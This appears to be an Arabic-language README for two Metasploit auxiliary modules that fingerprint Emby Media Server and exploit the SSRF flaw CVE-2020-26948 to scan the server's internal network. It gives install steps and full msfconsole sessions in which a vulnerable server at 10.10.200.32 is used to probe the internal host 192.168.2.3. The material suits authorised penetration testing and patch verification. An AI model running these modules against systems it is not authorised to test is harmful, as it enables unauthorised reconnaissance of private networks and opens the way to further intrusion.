
وحدة مساعدة من Metasploit تحدّد إصدار Emby Media Server وتستغل ثغرة SSRF المعروفة بـ CVE-2020-26948 لفحص خدمات الشبكة الداخلية.
تقوم هذه الأداة بفحص خادم EMBY البعيد لمحاولة استخدام ثغرة SSRF لإجراء فحص http للشبكة الداخلية لخادم EMBY. ويستند هذا إلى الثغرة CVE-2020-26948.
استنسخ المستودع وضع ملفات rb في الدليل /usr/share/metasploit-framework/modules/auxiliary/scanner/http/. ثم شغّل msfconsole واستخدم الوحدات من هناك.
use auxiliary/scanner/http/emby_version_ssrfset rhosts [ips]runmsf6 > use auxiliary/scanner/http/emby_version_ssrf
msf6 auxiliary(scanner/http/emby_version_ssrf) > set rhosts 10.10.200.32
rhosts => 10.10.200.32
msf6 auxiliary(scanner/http/emby_version_ssrf) > run
[*] Identifying Media Server Version on 10.10.200.32:8096
[+] [Media Server] URI: http://10.10.200.32:8096 /
[+] [Media Server] Version: 4.4.2.0
[+] [Media Server] Internal IP: http://192.168.2.3:8096
[+] *** Vulnerable to SSRF module auxiliary/scanner/emby_ssrf_scanner! ***
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
use auxiliary/scanner/http/emby_ssrf_scannerset rhosts [ips]set emby_server [emby_server_ip]runmsf6 > use auxiliary/scanner/http/emby_ssrf_scanner
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > set emby_server 10.10.200.32
emby_server => 10.10.200.32
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > set rhosts 192.168.2.3
rhosts => 192.168.2.3
msf6 auxiliary(scanner/http/emby_ssrf_scanner) > run
[+] 192.168.2.3:8096 Title: Emby
[+] 192.168.2.3:8096 HTTP Code: 200
[+] 192.168.2.3:8096 Location Header:
[+] 192.168.2.3:8096 Server Header: UPnP/1.0 DLNADOC/1.50
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed